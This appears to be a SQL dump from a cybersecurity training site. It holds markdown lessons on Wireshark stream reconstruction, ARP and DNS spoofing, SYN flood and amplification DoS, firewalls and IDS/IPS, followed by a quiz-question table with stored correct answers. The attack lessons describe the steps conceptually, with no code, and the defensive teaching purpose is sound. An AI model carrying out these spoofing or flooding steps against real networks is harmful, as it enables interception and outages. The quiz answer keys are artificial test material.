(1033, 820, '# Following Streams & Object Extraction\n\nWhen an attacker downloads malware via HTTP, or an employee uploads a confidential PDF via FTP, that data is split into hundreds of separate TCP segments. Looking at one packet at a time is useless for understanding the \"big picture.\"\n\n## Follow TCP Stream\nThis is arguably Wireshark\'s most powerful feature for reconstructing events.\n\nIf you right-click a packet that is part of a larger conversation (like an HTTP GET request) and select **Follow -> TCP Stream**, Wireshark performs magic:\n1.  It automatically figures out the source/dest IPs and ports.\n2.  It reassembles all the fragmented packets in the correct order.\n3.  It strips away all the OSI headers (MAC, IP, TCP headers).\n4.  It presents you with a clean text window showing *only* the application layer data.\n\n**Reading the Stream:**\n*   Text colored **Red** represents data sent from the Client to the Server (e.g., the browser asking \"GET /index.html\").\n*   Text colored **Blue** represents data sent from the Server to the Client (e.g., the server replying \"200 OK\" and the HTML code).\n\n*Note:* If you \"Follow\" a stream of an encrypted protocol like HTTPS or SSH, you will just see gibberish characters, because the payload is encrypted.\n\n## Extracting Objects\nIf you can see a file (like an image, a PDF, or an .exe) being downloaded over an unencrypted protocol (HTTP, FTP, SMB), Wireshark can carve that file right out of the PCAP and save it to your hard drive so you can analyze it.\n\n**How to Extract (HTTP):**\n1.  Go to **File -> Export Objects -> HTTP...**\n2.  Wireshark will open a window listing every single file transferred over HTTP during the entire packet capture.\n3.  It lists the Packet Number, Hostname, Content Type (e.g., `image/png` or `application/x-msdownload`), and the Filename.\n4.  You can select a suspicious file and click **\"Save\"** to put it on your Desktop. 
You can then submit that file to VirusTotal or analyze it in a sandbox.\n\nThis is a critical skill for extracting malware payloads that defense sensors may have missed, but the packet capture recorded.', 'markdown', 7, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1034, 821, '# ARP Spoofing & Poisoning\n\nThe Address Resolution Protocol (ARP) is fundamentally insecure by design because it is a \"stateless\" and \"trusting\" protocol. It was built in the early days of networking when everyone on a local network trusted each other.\n\n## How Normal ARP Works\nAs a reminder, ARP operates at Layer 2 (Data Link). When your computer (IP: `10.0.0.5`) wants to send a packet to the internet, it must first send it to your Default Gateway (the Router, IP: `10.0.0.1`). However, switches don\'t understand IP addresses; they only understand physical MAC addresses.\n\n1.  Your computer shouts out to the entire network: *\"Who has IP 10.0.0.1? Tell 10.0.0.5.\"*\n2.  The Router (`10.0.0.1`) replies directly to your computer: *\"I am 10.0.0.1, and my MAC address is AA:BB:CC:DD:EE:FF.\"*\n3.  Your computer saves this mapping in its temporary **ARP Cache**.\n\n## The Attack: ARP Spoofing\nThe flaw in ARP is that an attacker can send out an **ARP Reply** *even if no one asked for it* (this is called a Gratuitous ARP). Furthermore, devices will gladly accept this unsolicited reply and update their ARP cache without any verification.\n\n**The Scenario:**\nLet\'s say the Hacker\'s MAC address is `66:66:66:66:66:66`.\n\n1.  The attacker sends a forged ARP Reply to the Victim (`10.0.0.5`) saying: *\"Hey, the Router (10.0.0.1) is now at MAC 66:66:66:66:66:66.\"*\n2.  The Victim\'s computer blindly trusts this and updates its ARP cache.\n3.  The attacker also sends a forged ARP Reply to the true Router (`10.0.0.1`) saying: *\"Hey, the Victim (10.0.0.5) is now at MAC 66:66:66:66:66:66.\"*\n4.  The Router blindly trusts this and updates its ARP cache.\n\n## The Result: Man-in-the-Middle (MITM)\nBecause the attacker has \"poisoned\" the ARP cache of both the Victim and the Router, all traffic flowing between them now routes directly through the attacker\'s machine. 
\n\nThe attacker can now:\n*   **Packet Sniff:** Read unencrypted traffic (HTTP, FTP, Telnet) in real-time, stealing passwords and session cookies.\n*   **Packet Modify:** Alter the traffic in transit (e.g., replacing a legitimate software download with a malware payload).\n*   **Denial of Service (DoS):** Simply drop all the packets from the victim, disconnecting them from the internet (a \"Blackhole\" attack).\n\n*Note: ARP Spoofing only works on the LOCAL network (LAN). An attacker in Russia cannot ARP Spoof a victim in New York, because MAC addresses do not cross routers.*', 'markdown', 7, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1035, 822, '# DNS Spoofing & Hijacking\n\nIf ARP Spoofing redirects traffic based on physical MAC addresses, DNS Spoofing redirects traffic based on human-readable domain names. \n\nThe Domain Name System (DNS) translates a website name like `bank.com` into the server\'s IP address (e.g., `192.0.2.50`). If an attacker can manipulate this translation process, they control where the user goes.\n\n## Local DNS Spoofing (via MITM)\nThis is usually the next step after an attacker has successfully executed an ARP Spoofing Man-in-the-Middle attack.\n\n1.  The victim types `www.bank.com` into their browser.\n2.  The victim\'s computer sends a DNS Query asking for the IP of `bank.com`.\n3.  Because the attacker is actively performing a MITM attack via ARP Spoofing, that DNS Query flows through the attacker\'s machine.\n4.  The attacker intercepts the query and sends a fake DNS Reply back to the victim, claiming that `bank.com` is located at the Attacker\'s IP address (e.g., `10.0.0.66`).\n5.  The victim\'s browser connects to the Attacker\'s web server, which is hosting a perfect, pixel-for-pixel fake clone of the bank\'s login page. \n\nThe victim sees `www.bank.com` in the URL bar, but they are secretly typing their credentials into the attacker\'s database.\n\n## DNS Cache Poisoning (Server-Side)\nThis is a much larger scale attack. Instead of attacking a single victim, the attacker targets a recursive DNS server (like the one operated by your ISP, or even a public one like Google\'s `8.8.8.8`).\n\nThe attacker exploits vulnerabilities in the DNS server software (like BIND) to inject fake records into the server\'s cache.\nIf successful, *everyone* who relies on that DNS server will be redirected to the malicious site when they try to visit `bank.com`. 
This affects thousands or millions of users simultaneously.\n\n## Defending Against DNS Attacks\nBecause classic DNS operates over unencrypted UDP Port 53, it is highly vulnerable to tampering.\n*   **DNSSEC (DNS Security Extensions):** Adds cryptographic digital signatures to DNS records. When your computer looks up `bank.com`, the true owner of `bank.com` signs the response with a private key. Your computer verifies the signature with a public key. If an attacker modifies the IP address in transit, the signature breaks, and your computer drops the fake response.\n*   **DoH / DoT (DNS over HTTPS / TLS):** Encrypts the entire DNS conversation so a local MITM attacker cannot even see what domain you are querying, let alone modify the response.', 'markdown', 8, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1036, 823, '# Network Denial of Service (DoS)\n\nA Denial of Service (DoS) attack aims to make a machine or network resource unavailable to its intended users. It does not aim to steal data, but rather to disrupt operations. A Distributed Denial of Service (DDoS) attack uses a botnet (thousands of compromised computers) to execute the attack simultaneously.\n\n## Layer 4: SYN Flood\nThis attack exploits the stateful nature of the TCP 3-Way Handshake.\n\n*   The attacker sends a massive flood of **SYN** requests (Step 1) to a web server.\n*   The server replies to each with a **SYN-ACK** (Step 2) and leaves a \"half-open\" connection waiting in its memory for the final **ACK** (Step 3).\n*   The attacker intentionally *never* sends the final ACK. Sometimes they even spoof the source IP address of the initial SYN, so the server is sending the SYN-ACK to a random, offline IP.\n*   **The Result:** The web server\'s memory fills up with thousands of half-open connections. Eventually, it runs out of resources and drops legitimate new connections from real customers.\n\n## Layer 3 & 4: Amplification/Reflection Attacks\nAttackers love \"Amplification\" attacks because they act as a force multiplier. They send a tiny request and generate a massive response aimed at the victim. This relies on connectionless UDP protocols.\n\n**The Smurf Attack (ICMP):**\n1.  The attacker sends an ICMP Echo Request (Ping) to a network\'s broadcast address (e.g., `192.168.1.255`).\n2.  However, the attacker *spoofs* the source IP Address of the ping to be the Victim\'s IP address.\n3.  Every single computer on that network (maybe 200 machines) receives the ping, and all 200 simultaneously reply with an ICMP Echo Reply directed at the Victim.\n4.  One tiny packet from the attacker generated 200 packets hitting the victim.\n\n**DNS/NTP Amplification:**\n1.  The attacker sends a tiny UDP DNS Query (like \"give me all records for this domain\") to an open DNS server on the internet.\n2.  
They spoof the source IP to be the Victim\'s IP.\n3.  The DNS server generates a massive response (sometimes 50x larger than the request) and blasts it at the Victim.\n4.  Using a botnet, the attacker directs thousands of open DNS servers to reflect massive chunks of traffic at the victim, saturating their internet connection completely.', 'markdown', 6, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1037, 824, '# Firewalls: The First Line of Defense\n\nA firewall is a network security device that monitors and filters incoming and outgoing network traffic based on an organization\'s previously established security policies. It acts as the barrier between a trusted internal network and an untrusted external network (like the internet).\n\n## Types of Firewalls\nFirewalls have evolved significantly over the years, moving higher up the OSI model to provide better security.\n\n### 1. Packet-Filtering Firewalls (Stateless)\n*   **Operating Layer:** Layer 3 (Network) & Layer 4 (Transport).\n*   **How it works:** It looks at each individual packet in isolation. It checks the Source IP, Destination IP, Protocol, Source Port, and Destination Port against a list of rules (Access Control Lists or ACLs).\n*   **Pros:** Extremely fast and requires very little CPU power.\n*   **Cons:** \"Stateless\" means it has no memory of the connection. If you allow traffic OUT on port 80, you also have to manually write a rule allowing traffic IN from port 80 so the website can reply. This is tedious and insecure. It also cannot look inside the packet payload, so a malicious command sent over an allowed port (like HTTP 80) will pass right through.\n\n### 2. Stateful Inspection Firewalls\n*   **Operating Layer:** Layer 3 & Layer 4 (with session tracking).\n*   **How it works:** This is the standard modern firewall. It tracks the *state* of active connections. If an internal user initiates an outbound HTTP request, the firewall remembers this \"state.\" When the web server replies, the firewall automatically allows the inbound traffic because it belongs to an established, tracked session.\n*   **Pros:** Much more secure than stateless. You only need to write rules for the *initiation* of traffic.\n*   **Cons:** Still primarily focuses on IP addresses and ports, not the actual application data.\n\n### 3. 
Next-Generation Firewalls (NGFW)\n*   **Operating Layer:** Up to Layer 7 (Application).\n*   **How it works:** NGFWs (like Palo Alto, Fortinet, Cisco Firepower) do everything a stateful firewall does, but they also perform **Deep Packet Inspection (DPI)**. They look *inside* the payload of the packet.\n*   **Pros:** They understand applications, not just ports. An NGFW can differentiate between a user browsing Facebook (which might be allowed) and a user trying to play a game on Facebook (which might be blocked), even though both use HTTPS on Port 443. They also include built-in antivirus, intrusion prevention, and SSL decryption capabilities.\n\n## Default Deny Posture\nThe most fundamental rule of configuring *any* firewall is **Implicit Deny** or **Default Deny**. \nThis means you must explicitly define exactly what traffic is *allowed*. If traffic does not match an explicit \"Allow\" rule, the firewall drops it by default. \n\n**Deny vs Reject:**\n*   **Drop/Deny:** The firewall silently discards the packet. The sender gets no response, making it look like the IP address doesn\'t even exist. This is best practice for internet-facing interfaces to frustrate scanners.\n*   **Reject:** The firewall discards the packet but sends a polite \"Connection Refused\" (ICMP Destination Unreachable or TCP RST) back to the sender. This is sometimes used on internal networks for easier troubleshooting.', 'markdown', 7, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(1038, 825, '# Intrusion Detection vs. Intrusion Prevention\n\nWhile firewalls enforce policy based on *who* is talking to *who*, Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) look for malicious *behavior* or known bad *signatures* within the traffic.\n\n## Intrusion Detection System (IDS)\nAn IDS is a **passive** monitoring system. It is the security equivalent of a burglar alarm. \n\n*   **How it connects:** It is normally connected to a \"SPAN port\" or \"Mirror port\" on a network switch. The switch sends a *copy* of all network traffic to the IDS. The original traffic flows uninterrupted to its destination.\n*   **Action:** When the IDS detects a threat (e.g., an SQL injection payload inside an HTTP request), it generates an alert and sends it to the SIEM for the SOC team to review.\n*   **Pros:** Because it sits out-of-band (analyzing a copy), an IDS can never accidentally block legitimate traffic (no false positive blocks). If the IDS crashes, network traffic continues to flow normally.\n*   **Cons:** It cannot stop an attack. It only alerts you that an attack is currently happening or has already succeeded. The attack traffic still reaches the target server.\n\n## Intrusion Prevention System (IPS)\nAn IPS is an **active** defense system. It is the security equivalent of an armed guard at the door.\n\n*   **How it connects:** It is deployed **in-line** with the traffic. All traffic *must* physically flow through the IPS device before reaching the internal network or servers.\n*   **Action:** When the IPS detects a threat, it doesn\'t just generate an alert; it actively **drops the malicious packets**, resets the TCP connection, and blocks the attacker\'s IP address in real-time.\n*   **Pros:** It actually stops attacks before they reach the vulnerable server.\n*   **Cons:** Because it sits in-line, a false positive is disastrous. 
If the IPS mistakes a legitimate customer uploading a legitimate document for a malware attack, it drops the connection, causing a business outage. Furthermore, if an in-line IPS crashes, all network traffic stops unless it fails \"open\" (which brings its own security risks).\n\n## Detection Methods\nBoth IDS and IPS use two primary methods to find evil:\n\n1.  **Signature-Based:** Works exactly like traditional antivirus. It looks for a specific string of bytes (a signature) known to belong to a specific threat, like the \"EternalBlue\" exploit. It is highly accurate but cannot detect brand new, never-before-seen (Zero-Day) attacks because no signature exists yet.\n2.  **Anomaly/Behavior-Based:** Uses machine learning and statistical baselines to learn what \"normal\" network traffic looks like over several weeks. If suddenly the database server starts downloading 50GB of data at 3 AM (which it has never done before), the system flags it as anomalous. This *can* catch Zero-Day attacks, but suffers from a much higher rate of False Positives because networks are inherently unpredictable.', 'markdown', 7, '2026-03-09 22:28:55', '2026-03-09 22:28:55');

-- --------------------------------------------------------

--
-- Table structure for table `lesson_questions`
--

-- One row per quiz question attached to a lesson task; the seed rows
-- below show one `task_id` carrying several questions ordered by
-- `question_order`.
-- NOTE(review): no PRIMARY KEY, UNIQUE or FOREIGN KEY is declared in
-- this statement; the dump presumably adds keys in a later ALTER TABLE
-- (outside this chunk) — confirm, otherwise nothing prevents duplicate
-- `id` values or a duplicate (`task_id`, `question_order`) pair.
CREATE TABLE `lesson_questions` (
  `id` int(11) NOT NULL,
  -- Lesson task this question belongs to. No FK constraint is declared
  -- here, so orphaned rows are not rejected at the database layer.
  `task_id` int(11) NOT NULL,
  `question_text` text NOT NULL,
  -- Position of the question within its task (seed data uses 1..n).
  `question_order` int(11) NOT NULL,
  -- Stored in clear next to the question. Any query that feeds the
  -- question UI should omit this column; returning it to the client
  -- before the answer is submitted would leak the solution.
  `correct_answer` text NOT NULL,
  -- 0/1 flag; presumably controls whether the submitted answer is
  -- compared to `correct_answer` case-sensitively — confirm in the
  -- application code. All seed rows below use 0.
  `case_sensitive` tinyint(1) DEFAULT 0,
  `hint` text DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  -- Seed rows store a JSON array of answer choices as a string
  -- (e.g. '["A", "B", "C", "D"]'); the utf8mb4_bin longtext is how the
  -- dump renders that column. Treat it as untrusted text when parsing,
  -- and keep `correct_answer` matching one of these choices — no
  -- CHECK constraint enforces that here.
  `options` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL
) ;

--
-- Dumping data for table `lesson_questions`
--

INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(4164, 1, 'Which component of the CIA Triad ensures that data has not been tampered with?', 1, 'Integrity', 0, 'Think about accuracy and trustworthiness.', '2025-12-26 14:39:59', '[\"Confidentiality\", \"Integrity\", \"Availability\", \"Authorization\"]'),
(4165, 1, 'What is the primary goal of a Phishing attack?', 2, 'To trick users into revealing information', 0, 'It often involves fraudulent emails.', '2025-12-26 14:39:59', '[\"To encrypt hard drives\", \"To slow down the network\", \"To trick users into revealing information\", \"To physically damage hardware\"]'),
(4166, 1, 'Who is considered the \"first line of defense\" in a security team?', 3, 'SOC Analyst', 0, 'They monitor alerts and logs daily.', '2025-12-26 14:39:59', '[\"CISO\", \"SOC Analyst\", \"HR Manager\", \"External Auditors\"]'),
(4167, 2, 'What is the first step in response?', 1, 'Detection', 0, 'Finding it', '2025-12-26 14:39:59', '[\"Panic\", \"Shutdown\", \"Detection\", \"Ignoring\"]'),
(4168, 2, 'Who is the primary adversary?', 2, 'Threat actor', 0, 'Malicious user', '2025-12-26 14:39:59', '[\"Threat actor\", \"Manager\", \"System admin\", \"Regular user\"]'),
(4169, 2, 'What is the priority level?', 3, 'High priority', 0, 'Urgency level', '2025-12-26 14:39:59', '[\"No priority\", \"Optional\", \"Low priority\", \"High priority\"]'),
(4170, 3, 'What is the main output?', 1, 'Log data', 0, 'Event records', '2025-12-26 14:39:59', '[\"Log data\", \"Video streams\", \"Music files\", \"Printer ink\"]'),
(4171, 3, 'When to escalate?', 2, 'Confirmed threat', 0, 'Real danger', '2025-12-26 14:39:59', '[\"Confirmed threat\", \"False alarm\", \"User login\", \"Minor bug\"]'),
(4172, 3, 'What is the priority level?', 3, 'High priority', 0, 'Urgency level', '2025-12-26 14:39:59', '[\"High priority\", \"Low priority\", \"Optional\", \"No priority\"]'),
(4173, 4, 'What is the defensive goal?', 1, 'Protection', 0, 'Safety', '2025-12-26 14:39:59', '[\"Deleting\", \"Protection\", \"Exposure\", \"Sharing\"]'),
(4174, 4, 'What is the first step in response?', 2, 'Detection', 0, 'Finding it', '2025-12-26 14:39:59', '[\"Panic\", \"Ignoring\", \"Shutdown\", \"Detection\"]'),
(4175, 4, 'What tool category is this?', 3, 'Security tool', 0, 'Software type', '2025-12-26 14:39:59', '[\"Game engine\", \"Music player\", \"Security tool\", \"Office tool\"]'),
(4176, 5, 'Who is the primary adversary?', 1, 'Threat actor', 0, 'Malicious user', '2025-12-26 14:39:59', '[\"Threat actor\", \"System admin\", \"Manager\", \"Regular user\"]'),
(4177, 5, 'What is the main output?', 2, 'Log data', 0, 'Event records', '2025-12-26 14:39:59', '[\"Printer ink\", \"Music files\", \"Video streams\", \"Log data\"]'),
(4178, 5, 'What should you analyze first?', 3, 'Context', 0, 'The situation', '2025-12-26 14:39:59', '[\"Weather\", \"Lunch menu\", \"Sports scores\", \"Context\"]'),
(4179, 6, 'What is the primary goal of this concept?', 1, 'Risk reduction', 0, 'Lowers danger', '2025-12-26 14:39:59', '[\"Risk reduction\", \"Data deletion\", \"Cost increase\", \"System slowdown\"]'),
(4180, 6, 'What should you analyze first?', 2, 'Context', 0, 'The situation', '2025-12-26 14:39:59', '[\"Context\", \"Sports scores\", \"Weather\", \"Lunch menu\"]'),
(4181, 6, 'When to escalate?', 3, 'Confirmed threat', 0, 'Real danger', '2025-12-26 14:39:59', '[\"False alarm\", \"Confirmed threat\", \"User login\", \"Minor bug\"]'),
(4182, 7, 'What tool category is this?', 1, 'Security tool', 0, 'Software type', '2025-12-26 14:39:59', '[\"Office tool\", \"Music player\", \"Game engine\", \"Security tool\"]'),
(4183, 7, 'What is the primary goal of this concept?', 2, 'Risk reduction', 0, 'Lowers danger', '2025-12-26 14:39:59', '[\"Risk reduction\", \"Data deletion\", \"Cost increase\", \"System slowdown\"]'),
(4184, 7, 'Which team handles these incidents?', 3, 'SOC team', 0, 'Security Operations', '2025-12-26 14:39:59', '[\"HR Department\", \"SOC team\", \"Marketing\", \"Sales Team\"]'),
(4185, 8, 'What is the main output?', 1, 'Log data', 0, 'Event records', '2025-12-26 14:39:59', '[\"Log data\", \"Music files\", \"Printer ink\", \"Video streams\"]'),
(4186, 8, 'What is the first step in response?', 2, 'Detection', 0, 'Finding it', '2025-12-26 14:39:59', '[\"Ignoring\", \"Panic\", \"Detection\", \"Shutdown\"]'),
(4187, 8, 'What is the primary goal of this concept?', 3, 'Risk reduction', 0, 'Lowers danger', '2025-12-26 14:39:59', '[\"Cost increase\", \"System slowdown\", \"Data deletion\", \"Risk reduction\"]'),
(4188, 9, 'What tool category is this?', 1, 'Security tool', 0, 'Software type', '2025-12-26 14:39:59', '[\"Office tool\", \"Security tool\", \"Music player\", \"Game engine\"]'),
(4189, 9, 'What should you analyze first?', 2, 'Context', 0, 'The situation', '2025-12-26 14:39:59', '[\"Weather\", \"Context\", \"Lunch menu\", \"Sports scores\"]'),
(4190, 9, 'Who is the primary adversary?', 3, 'Threat actor', 0, 'Malicious user', '2025-12-26 14:39:59', '[\"Threat actor\", \"System admin\", \"Manager\", \"Regular user\"]'),
(4191, 10, 'What should you analyze first?', 1, 'Context', 0, 'The situation', '2025-12-26 14:39:59', '[\"Weather\", \"Sports scores\", \"Lunch menu\", \"Context\"]'),
(4192, 10, 'Which team handles these incidents?', 2, 'SOC team', 0, 'Security Operations', '2025-12-26 14:39:59', '[\"Marketing\", \"SOC team\", \"Sales Team\", \"HR Department\"]'),
(4193, 10, 'Who is the primary adversary?', 3, 'Threat actor', 0, 'Malicious user', '2025-12-26 14:39:59', '[\"System admin\", \"Threat actor\", \"Regular user\", \"Manager\"]'),
(4194, 11, 'What is the main output?', 1, 'Log data', 0, 'Event records', '2025-12-26 14:39:59', '[\"Video streams\", \"Log data\", \"Printer ink\", \"Music files\"]'),
(4195, 11, 'What is the first step in response?', 2, 'Detection', 0, 'Finding it', '2025-12-26 14:39:59', '[\"Shutdown\", \"Detection\", \"Panic\", \"Ignoring\"]'),
(4196, 11, 'When to escalate?', 3, 'Confirmed threat', 0, 'Real danger', '2025-12-26 14:39:59', '[\"User login\", \"False alarm\", \"Confirmed threat\", \"Minor bug\"]'),
(4197, 12, 'What is the primary goal of this concept?', 1, 'Risk reduction', 0, 'Lowers danger', '2025-12-26 14:39:59', '[\"Cost increase\", \"System slowdown\", \"Risk reduction\", \"Data deletion\"]'),
(4198, 12, 'When to escalate?', 2, 'Confirmed threat', 0, 'Real danger', '2025-12-26 14:39:59', '[\"Minor bug\", \"Confirmed threat\", \"User login\", \"False alarm\"]'),
(4199, 12, 'What is the defensive goal?', 3, 'Protection', 0, 'Safety', '2025-12-26 14:39:59', '[\"Exposure\", \"Deleting\", \"Protection\", \"Sharing\"]'),
(5264, 32, 'What is the standard system drive letter?', 1, 'C:', 0, 'Primary Windows drive', '2025-12-26 20:49:49', '[\"A:\", \"B:\", \"C:\", \"D:\"]'),
(5265, 32, 'Which file system is modern and supports permissions?', 2, 'NTFS', 0, 'Permissions supported', '2025-12-26 20:49:49', '[\"FAT32\", \"NTFS\", \"exFAT\", \"HFS+\"]'),
(5266, 32, 'What is the max file size for FAT32?', 3, '4 GB', 0, 'Size limit', '2025-12-26 20:49:49', '[\"2 GB\", \"4 GB\", \"8 GB\", \"Unlimited\"]'),
(5267, 33, 'What does UAC stand for?', 1, 'User Account Control', 0, 'Permission system', '2025-12-26 20:49:49', '[\"User Access Control\", \"User Account Control\", \"Unified Access Center\", \"Universal App Control\"]'),
(5268, 33, 'Which color shield indicates a trusted app?', 2, 'Blue', 0, 'Signed application', '2025-12-26 20:49:49', '[\"Red\", \"Yellow\", \"Blue\", \"Green\"]'),
(5269, 33, 'Which UAC level is the most secure?', 3, 'Always Notify', 0, 'Maximum protection', '2025-12-26 20:49:49', '[\"Always Notify\", \"Notify me only when apps try to make changes\", \"Notify me (do not dim my desktop)\", \"Never Notify\"]'),
(5270, 34, 'Which hive stores system-wide settings?', 1, 'HKLM', 0, 'LOCAL_MACHINE', '2025-12-26 20:49:49', '[\"HKCU\", \"HKLM\", \"HKU\", \"HKCR\"]'),
(5271, 34, 'What is the GUI tool for editing the registry?', 2, 'regedit', 0, 'Graphical editor', '2025-12-26 20:49:49', '[\"cmd\", \"regedit\", \"taskmgr\", \"msconfig\"]'),
(5272, 34, 'Which data type is used for text strings?', 3, 'REG_SZ', 0, 'String Value', '2025-12-26 20:49:49', '[\"REG_DWORD\", \"REG_BINARY\", \"REG_SZ\", \"REG_MULTI_SZ\"]'),
(5273, 35, 'What does AD stand for?', 1, 'Active Directory', 0, 'Directory service', '2025-12-26 20:49:49', '[\"Advanced Directory\", \"Active Directory\", \"Access Domain\", \"Admin Domain\"]'),
(5274, 35, 'Which server role authenticates users in AD?', 2, 'Domain Controller', 0, 'Runs AD DS', '2025-12-26 20:49:49', '[\"File Server\", \"Web Server\", \"Domain Controller\", \"DNS Server\"]'),
(5275, 35, 'What is the primary authentication protocol in AD?', 3, 'Kerberos', 0, 'Ticket-based', '2025-12-26 20:49:49', '[\"NTLM\", \"Kerberos\", \"Radius\", \"LDAP\"]'),
(5276, 36, 'What is the naming format for PowerShell cmdlets?', 1, 'Verb-Noun', 0, 'Action-Target', '2025-12-26 20:49:49', '[\"Verb-Noun\", \"Noun-Verb\", \"Action-Object\", \"Subject-Predicate\"]'),
(5277, 36, 'Which cmdlet lists running processes?', 2, 'Get-Process', 0, 'Usage: Get-Process', '2025-12-26 20:49:49', '[\"list-proc\", \"Get-Process\", \"Show-Tasks\", \"ps-list\"]'),
(5278, 36, 'What is the file extension for PowerShell scripts?', 3, '.ps1', 0, 'PowerShell 1', '2025-12-26 20:49:49', '[\".bat\", \".sh\", \".ps1\", \".exe\"]'),
(5279, 37, 'Which event ID indicates a successful logon?', 1, '4624', 0, 'Security Success', '2025-12-26 20:49:49', '[\"4625\", \"4624\", \"4672\", \"1074\"]'),
(5280, 37, 'Which event ID indicates a failed logon?', 2, '4625', 0, 'Security Failure', '2025-12-26 20:49:49', '[\"4624\", \"4625\", \"4768\", \"7045\"]'),
(5281, 37, 'Which log records login attempts?', 3, 'Security', 0, 'Auth events', '2025-12-26 20:49:49', '[\"System\", \"Application\", \"Security\", \"Setup\"]'),
(5282, 38, 'What does GPO stand for?', 1, 'Group Policy Object', 0, 'Config object', '2025-12-26 20:49:49', '[\"General Policy Option\", \"Group Policy Object\", \"Global Permission Order\", \"Group Permission Object\"]'),
(5283, 38, 'Which command forces a GP update?', 2, 'gpupdate /force', 0, 'Refresh command', '2025-12-26 20:49:49', '[\"gpupdate /force\", \"gprefresh\", \"update-policy\", \"gpreload\"]'),
(5284, 38, 'What is the order of GPO application?', 3, 'LSDOU', 0, 'Local, Site, Domain, OU', '2025-12-26 20:49:49', '[\"DSOUL\", \"LSDOU\", \"OUDSC\", \"SLDOU\"]'),
(5285, 39, 'Which built-in tool provides real-time virus protection?', 1, 'Windows Defender', 0, 'Antivirus', '2025-12-26 20:49:49', '[\"Windows Firewall\", \"Windows Defender\", \"BitLocker\", \"SmartScreen\"]'),
(5286, 39, 'Which Sysinternals tool is an advanced Task Manager?', 2, 'Process Explorer', 0, 'Process info', '2025-12-26 20:49:49', '[\"Process Monitor\", \"Autoruns\", \"Process Explorer\", \"PsExec\"]'),
(5287, 39, 'Which tool provides full disk encryption?', 3, 'BitLocker', 0, 'Disk security', '2025-12-26 20:49:49', '[\"SecureBoot\", \"BitLocker\", \"EFS\", \"Vault\"]'),
(5339, 22, 'Which layer is responsible for logical addressing (IPs)?', 1, 'Network', 0, 'Layer 3', '2025-12-26 20:53:36', '[\"Data Link\", \"Network\", \"Transport\", \"Session\"]'),
(5340, 22, 'What is the PDU of Layer 4 (Transport)?', 2, 'Segments', 0, 'TCP Data unit', '2025-12-26 20:53:36', '[\"Bits\", \"Frames\", \"Packets\", \"Segments\"]'),
(5341, 22, 'Which layer handles encryption and compression?', 3, 'Presentation', 0, 'Layer 6', '2025-12-26 20:53:36', '[\"Application\", \"Presentation\", \"Session\", \"Transport\"]'),
(5342, 23, 'Which protocol uses a 3-way handshake?', 1, 'TCP', 0, 'Connection-oriented', '2025-12-26 20:53:36', '[\"UDP\", \"IP\", \"TCP\", \"ICMP\"]'),
(5343, 23, 'Why is UDP used for video streaming?', 2, 'Speed', 0, 'Low overhead', '2025-12-26 20:53:36', '[\"Reliability\", \"Encryption\", \"Speed\", \"Guaranteed Delivery\"]'),
(5344, 23, 'Which TCP/IP layer corresponds to OSI Layer 3 (Network)?', 3, 'Internet', 0, 'IP Layer', '2025-12-26 20:53:36', '[\"Network Access\", \"Internet\", \"Transport\", \"Application\"]'),
(5345, 24, 'Which IP address is a private Class C address?', 1, '192.168.1.10', 0, 'Home router default', '2025-12-26 20:53:36', '[\"8.8.8.8\", \"172.16.0.1\", \"192.168.1.10\", \"10.0.0.5\"]'),
(5346, 24, 'How many bits are in an IPv4 address?', 2, '32', 0, 'Binary count', '2025-12-26 20:53:36', '[\"128\", \"64\", \"32\", \"16\"]'),
(5347, 24, 'What allows private IPs to access the internet?', 3, 'NAT', 0, 'Translation', '2025-12-26 20:53:36', '[\"DHCP\", \"DNS\", \"NAT\", \"ARP\"]'),
(5348, 25, 'What is the CIDR notation for 255.255.255.0?', 1, '/24', 0, 'Count the bits', '2025-12-26 20:53:36', '[\"/8\", \"/16\", \"/24\", \"/32\"]'),
(5349, 25, 'How many usable hosts are in a /24 network?', 2, '254', 0, '256 minus 2', '2025-12-26 20:53:36', '[\"256\", \"255\", \"254\", \"250\"]'),
(5350, 25, 'The first address in a subnet is used for what?', 3, 'Network ID', 0, 'Identification', '2025-12-26 20:53:36', '[\"Broadcast\", \"Gateway\", \"Network ID\", \"DNS\"]'),
(5351, 26, 'Which record maps a name to an IPv4 address?', 1, 'A', 0, 'Address', '2025-12-26 20:53:36', '[\"AAAA\", \"CNAME\", \"A\", \"MX\"]'),
(5352, 26, 'Which record is used for email server delivery?', 2, 'MX', 0, 'Mail Exchange', '2025-12-26 20:53:36', '[\"TXT\", \"PTR\", \"MX\", \"NS\"]'),
(5353, 26, 'What translates domain names to IPs?', 3, 'DNS', 0, 'System name', '2025-12-26 20:53:36', '[\"DHCP\", \"ARP\", \"DNS\", \"NAT\"]'),
(5354, 27, 'What is the first step in the DHCP process?', 1, 'Discover', 0, 'Looking for server', '2025-12-26 20:53:36', '[\"Offer\", \"Request\", \"Discover\", \"Acknowledge\"]'),
(5355, 27, 'What does ARP resolution map?', 2, 'IP to MAC', 0, 'Logical to Physical', '2025-12-26 20:53:36', '[\"MAC to IP\", \"IP to MAC\", \"URL to IP\", \"Port to Protocol\"]'),
(5356, 27, 'What attack relies on faking ARP replies?', 3, 'ARP Spoofing', 0, 'MITM', '2025-12-26 20:53:36', '[\"DNS Poisoning\", \"ARP Spoofing\", \"DDoS\", \"Phishing\"]'),
(5357, 28, 'Which port is used for Secure Shell (SSH)?', 1, '22', 0, 'Encrypted CLI', '2025-12-26 20:53:36', '[\"21\", \"22\", \"23\", \"25\"]'),
(5358, 28, 'Which protocol is UNSAFE for remote administration?', 2, 'Telnet', 0, 'Cleartext', '2025-12-26 20:53:36', '[\"SSH\", \"RDP\", \"HTTPS\", \"Telnet\"]'),
(5359, 28, 'Port 445 is associated with which service?', 3, 'SMB', 0, 'Windows Sharing', '2025-12-26 20:53:36', '[\"FTP\", \"SMB\", \"DNS\", \"HTTP\"]'),
(5363, 30, 'What protocol exposed the password?', 1, 'HTTP', 0, 'Unsecure', '2025-12-26 20:53:36', '[\"HTTPS\", \"SSH\", \"SFTP\", \"HTTP\"]'),
